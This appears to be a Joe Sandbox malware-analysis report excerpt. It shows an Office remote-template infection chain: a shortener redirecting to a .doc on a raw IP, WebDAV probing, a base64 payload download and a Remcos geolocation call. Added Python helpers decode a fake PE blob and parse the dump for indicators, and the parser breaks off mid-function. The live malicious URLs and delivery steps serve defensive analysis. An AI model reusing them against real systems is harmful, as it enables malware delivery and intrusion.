                                                                      Aug 28, 2024 06:54:13.525909901 CEST1120INData Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64
                                                                      Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
                                                                      Aug 28, 2024 06:54:13.525916100 CEST1236INData Raw: 6f 41 4e 35 54 44 37 30 45 4f 4e 68 53 44 6a 30 67 48 4e 73 52 7a 49 7a 4d 2b 4d 51 50 6a 72 7a 67 34 4d 6c 4e 44 48 7a 63 78 4d 52 4d 44 44 79 6f 74 4d 50 4b 44 61 79 51 54 4d 69 47 7a 6a 78 6b 56 4d 69 41 54 37 77 51 4f 4d 57 44 54 77 77 45 4a
                                                                      Data Ascii: oAN5TD70EONhSDj0gHNsRzIzM+MQPjrzg4MlNDHzcxMRMDDyotMPKDayQTMiGzjxkVMiAT7wQOMWDTwwEJM6BzbwsFMQBzSwoCAAAArAQA8A8T/9sePQ3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GA
                                                                      Aug 28, 2024 06:54:13.525928974 CEST | 1236 | IN | Data Raw: 79 44 70 38 55 48 50 58 78 6a 55 38 30 45 50 43 78 6a 4a 38 49 77 4f 50 76 6a 79 37 55 38 4f 36 75 54 69 37 55 32 4f 67 74 7a 57 37 41 31 4f 30 73 54 48 37 49 67 4f 39 72 44 2b 36 30 75 4f 52 72 54 77 36 41 71 4f 62 71 6a 6c 36 73 6f 4f 70 70 7a
                                                                      Data Ascii: yDp8UHPXxjU80EPCxjJ8IwOPvjy7U8O6uTi7U2OgtzW7A1O0sTH7IgO9rD+60uORrTw6AqObqjl6soOppzV6kjO0ozL6QiOIkz85kcOEnzv5QbOYmjj5MXOulTa54VOClTL5kQOEgz/4QPOYjDt4cIOCiTf4IHOWhDT44COpgDJ4kxN9fz83g9NTfjz3M8NneTn3I4N9dDe302NRdzR3wyNncjI3chNkbDw2srN2azq24oNqZjN
                                                                      Aug 28, 2024 06:54:13.526078939 CEST | 1236 | IN | Data Raw: 4d 78 4e 46 66 44 71 33 59 6c 4e 77 58 44 32 31 73 42 4e 69 54 44 76 30 41 34 4d 6a 4b 54 73 79 41 59 4d 69 48 54 6e 78 6f 57 4d 59 41 7a 36 77 34 4c 4d 4d 41 41 41 41 41 44 41 45 41 42 41 41 41 77 50 58 39 7a 4a 39 6b 64 50 53 32 7a 4e 39 6b 69
                                                                      Data Ascii: MxNFfDq3YlNwXD21sBNiTDv0A4MjKTsyAYMiHTnxoWMYAz6w4LMMAAAAADAEABAAAwPX9zJ9kdPS2zN9kiOxrTJ4kPOphzQ4YyN0YjT1ceNUXTo1EnMXLjlyUnMRJjSyUUMVHTGwoEAAAAQAQAAA8jl/E5Py5jd+UlPx4jK+USP4yDz8wZOAljNycrMQAD4woLMdCAAAwCADAPAAAwPn/zy/I3PYlTG4YLOkhDY4wFOYhDV4AFO
                                                                      Aug 28, 2024 06:54:13.526089907 CEST | 1236 | IN | Data Raw: 45 7a 41 77 34 50 4d 34 44 6a 38 77 77 4f 4d 6e 44 54 34 77 73 4e 4d 56 44 44 30 77 6f 4d 4d 45 44 6a 76 77 6b 4c 4d 7a 43 54 72 77 63 4b 4d 69 43 44 6e 77 59 4a 4d 51 43 7a 69 77 55 49 4d 2f 42 54 65 77 51 48 4d 75 42 44 61 77 49 47 4d 64 42 7a
                                                                      Data Ascii: EzAw4PM4Dj8wwOMnDT4wsNMVDD0woMMEDjvwkLMzCTrwcKMiCDnwYJMQCziwUIM/BTewQHMuBDawIGMdBzVwEFMLBjRwAEM6ADNw8CMpAzIw0BMYAjEwwAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7Pq+Tp/85PZ+zk/44PI+jg/w3P39Tc/s2Pl9DY/o1PU9jT/k0PD9TP/czPy8DL/YyPg8zG
                                                                      Aug 28, 2024 06:54:13.526102066 CEST | 1236 | IN | Data Raw: 44 77 4f 79 73 6a 4a 37 67 67 4f 6a 72 44 7a 36 73 57 4f 38 6e 6a 36 35 55 64 4f 49 44 41 41 41 77 42 41 43 41 4c 41 41 41 41 4e 63 53 6a 6b 30 49 31 4d 4c 4e 44 50 7a 45 7a 4d 6d 4d 7a 47 7a 34 67 4d 36 4c 6a 36 41 41 41 41 67 41 67 41 51 43 67
                                                                      Data Ascii: DwOysjJ7ggOjrDz6sWO8nj65UdOIDAAAwBACALAAAANcSjk0I1MLNDPzEzMmMzGz4gM6Lj6AAAAgAgAQCgOeqjm6YpOSqjj6ooOGqjg64nO6pjd6InOupja6YmOipjU60jOroTI6cRO7nD750dOWnDz5IcO4mjr5QaOxlDW5IUOpkjI5YROPkDC44NOUjTz4YMO/iDu4QIO6hzc4sDO0gjF3o/NpDAAAAHACAIAAAQOikzG58QO
                                                                      Aug 28, 2024 06:54:13.526196957 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:12 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:33:15 GMT
                                                                      ETag: "a1000-620ab1f342ee9"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 659456
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/plain
                                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
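The 200 OK above is served as text/plain with Content-Length 659456, and every byte of the body the sandbox captured is in the base64 alphabet, with a long run of "A" (encoded zero bytes) at the start of the chunk. Second-stage loaders that fetch a payload this way frequently store the encoded executable back-to-front, so that a straight base64 decode yields nothing recognisable; the report does not state which orientation this sample uses, and that is treated as an assumption below. The following helper is an added example and is not part of Joe Sandbox or of this report: it decodes a dumped blob in both orientations and accepts a result only if it finds a well-formed PE header (MZ, a plausible e_lfanew, and the PE signature at that offset), rather than trusting the first two bytes. The sample input is a constructed minimal PE image, base64-encoded and reversed; nothing is fetched from any URL in the report. To use it on a real capture, save the response body to a file and pass its contents to classify_blob.

```python
"""Does a dumped text/plain blob decode to a PE image, as-is or reversed? Added example."""
import base64
import re
import struct

B64_CHARS = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def decode_variants(text):
    """Yield (variant, data) for each orientation that decodes as base64: the blob as dumped and
    the blob reversed. Assumption: loaders of this kind often store the string back-to-front."""
    s = "".join(text.split())                    # the dump may wrap or space the text
    for variant, cand in (("plain", s), ("reversed", s[::-1])):
        if not B64_CHARS.match(cand):
            continue
        try:
            yield variant, base64.b64decode(cand + "=" * (-len(cand) % 4), validate=True)
        except ValueError:                       # binascii.Error: bad padding / length
            continue


def find_pe(data):
    """Return (mz_offset, pe_offset, machine) for the first well-formed PE header, else None.
    A bare 'MZ' is not enough: e_lfanew must point inside the buffer at a PE signature."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\0\0" and pe + 6 <= len(data):
                return pos, pe, struct.unpack_from("<H", data, pe + 4)[0]
        pos = data.find(b"MZ", pos + 1)
    return None


def classify_blob(text):
    """Decode a dumped blob in both orientations and report the first one holding a PE image."""
    for variant, data in decode_variants(text):
        if hit := find_pe(data):
            mz, pe, machine = hit
            return {"variant": variant, "size": len(data), "mz_offset": mz,
                    "pe_offset": pe, "machine": hex(machine)}
    return None


def fake_pe(machine=0x14C, tail=64):
    """Constructed minimal PE-shaped image (not the sample's payload): DOS header with
    e_lfanew = 0x80, PE signature, COFF header, then zero padding so that the base64
    ends (or, once reversed, begins) with a run of 'A' like the dump above."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xE0, 0x10F)
    return bytes(dos) + coff + bytes(tail)


# Stand-in for the 659456-byte text/plain body: the constructed image, base64-encoded, reversed.
SAMPLE_BLOB = base64.b64encode(fake_pe()).decode()[::-1]

if __name__ == "__main__":
    print(classify_blob(SAMPLE_BLOB))
```

The header check matters more than the decode: a 659 KB base64 blob decoded the wrong way round still produces bytes, and "MZ" will occur by chance in random data; requiring e_lfanew to land on "PE\0\0" is what makes a hit meaningful. The machine field (0x14c for x86, 0x8664 for x64) tells you straight away which host process the loader will need for injection.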


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | 2780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Aug 28, 2024 06:54:15.430372953 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                                      Host: geoplugin.net
                                                                      Cache-Control: no-cache
                                                                      Aug 28, 2024 06:54:16.039000988 CEST | 1170 | IN | HTTP/1.1 200 OK
                                                                      date: Wed, 28 Aug 2024 04:54:15 GMT
                                                                      server: Apache
                                                                      content-length: 962
                                                                      content-type: application/json; charset=utf-8
                                                                      cache-control: public, max-age=300
                                                                      access-control-allow-origin: *
                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.22 | 49161 | 88.99.66.38 | 443 | 3368 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:53:50 UTC | 321 | OUT | GET /FoNVg0 HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: zhort.de
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:53:50 UTC | 590 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:50 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc
                                                                      Vary: Accept
                                                                      X-Served-By: zhort.de
                                                                      2024-08-28 04:53:50 UTC | 200 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 33 31 2e 32 31 2f 78 61 6d 70 70 2f 6e 62 63 2f 75 6e 2f 73 77 65 65 74 74 61 73 74 65 64 62 61 6e 61 6e 61 62 75 74 74 65 72 73 6d 6f 6f 74 68 63 68 63 6f 6c 63 61 74 65 62 75 74 74 65 72 72 69 63 68 63 6f 6e 74 65 6e 74 74 6f 6b 65 65 70 73 6d 6f 6f 74 68 62 75 74 74 65 72 63 68 6f 63 6f 6c 61 74 65 62 75 6e 74 6f 67 65 74 6d 65 73 77 65 65 74 67 69 72 6c 5f 5f 5f 5f 5f 5f 5f 5f 79 75 6d 6d 79 62 75 74 74 65 72 63 68 6f 63 6f 6c 61 74 65 73 6d 6f 6f 74 68 68 65 72 65 74 2e 64 6f 63
                                                                      Data Ascii: Found. Redirecting to http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.22 | 49163 | 88.99.66.38 | 443 | 3672 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:53:52 UTC | 130 | OUT | OPTIONS / HTTP/1.1
                                                                      User-Agent: Microsoft Office Protocol Discovery
                                                                      Host: zhort.de
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:53:52 UTC | 450 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:52 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      X-Served-By: zhort.de
                                                                      2024-08-28 04:53:52 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.22 | 49164 | 88.99.66.38 | 443 | 3672 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:53:54 UTC | 115 | OUT | HEAD /FoNVg0 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: zhort.de
                                                                      2024-08-28 04:53:54 UTC | 602 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:54 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc
                                                                      Vary: Accept
                                                                      X-Served-By: zhort.de


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      3 | 192.168.2.22 | 49165 | 88.99.66.38 | 443
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:53:58 UTC | 125 | OUT | OPTIONS / HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                      translate: f
                                                                      Host: zhort.de
                                                                      2024-08-28 04:53:58 UTC | 450 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      X-Served-By: zhort.de
                                                                      2024-08-28 04:53:58 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      4 | 192.168.2.22 | 49166 | 88.99.66.38 | 443
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:54:00 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 7a 68 6f 72 74 2e 64 65 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                  Depth: 0
                                                                                  translate: f
                                                                                  Content-Length: 0
                                                                                  Host: zhort.de
                                                                      2024-08-28 04:54:00 UTC | 423 | IN | HTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:54:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      2024-08-28 04:54:00 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      5 | 192.168.2.22 | 49167 | 88.99.66.38 | 443
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:54:01 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 7a 68 6f 72 74 2e 64 65 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                  Depth: 0
                                                                                  translate: f
                                                                                  Content-Length: 0
                                                                                  Host: zhort.de
                                                                      2024-08-28 04:54:01 UTC | 423 | IN | HTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:54:01 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      2024-08-28 04:54:01 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.22 | 49168 | 88.99.66.38 | 443 | 3672 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:54:02 UTC | 134 | OUT | HEAD /FoNVg0 HTTP/1.1
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: zhort.de
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:54:02 UTC | 602 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:54:02 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc
                                                                      Vary: Accept
                                                                      X-Served-By: zhort.de
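Sessions 0 to 6 above are the remote-template hand-off in one piece: EXCEL.EXE requests the shortener URL, zhort.de answers 302 to a .doc on a bare IP, WINWORD.EXE probes the same host with the "Microsoft Office Protocol Discovery" and "Microsoft Office Existence Discovery" user agents, and the WebDAV Mini-Redirector follows with OPTIONS and PROPFIND (the "ms-search protocol handler (WebDAV)" signature in the overview). Later in this report RegAsm.exe, the Remcos host process, queries geoplugin.net. The user agents, the redirect from a shortener to an Office document on a raw IP, and the list of processes issuing the requests are the indicators worth pulling out of a dump like this. The following is an added example and is not part of Joe Sandbox or of this report: a parser for the text export shown above, where timestamp, byte count, direction and data run together on one line and requests the report shows only as hex ("Data Raw") must be decoded, plus a triage pass that emits those indicators. Assumptions: only the process path is taken from the session row, because the fused source-port/destination-IP and destination-port/PID digits cannot be split unambiguously from the text alone; the sample rows are constructed from the sessions above, with the PROPFIND request re-encoded as hex from the request the report decodes.

```python
"""Triage of Joe Sandbox HTTP session dumps in the fused text form shown above (added example)."""
import re

ROW_RE = re.compile(    # timestamp, byte count, direction and data run together in the text export
    r"^(?P<ts>(?:\d{4}-\d\d-\d\d \d\d:\d\d:\d\d"
    r"|[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) (?:UTC|CEST))"
    r"(?P<bytes>\d+)(?P<dir>IN|OUT)(?P<data>.*)$")
PROC_RE = re.compile(r"([A-Za-z]:\\.*)$")   # trailing process path of a session row
HTTP_START = ("GET ", "HEAD ", "POST ", "OPTIONS ", "PROPFIND ", "HTTP/1.")
DOC_EXT = (".doc", ".docx", ".dot", ".dotm", ".rtf", ".xls", ".xlsx")
PROBE_AGENTS = ("Microsoft Office Protocol Discovery",
                "Microsoft Office Existence Discovery", "Microsoft-WebDAV-MiniRedir")
UNEXPECTED_CLIENTS = ("EXCEL.EXE", "WINWORD.EXE", "EQNEDT32.EXE", "RegAsm.exe", "powershell.exe")


def decode_raw(data):
    """Decode a 'Data Raw: 50 52 ...' hex row to (first_line, headers) when it is HTTP text."""
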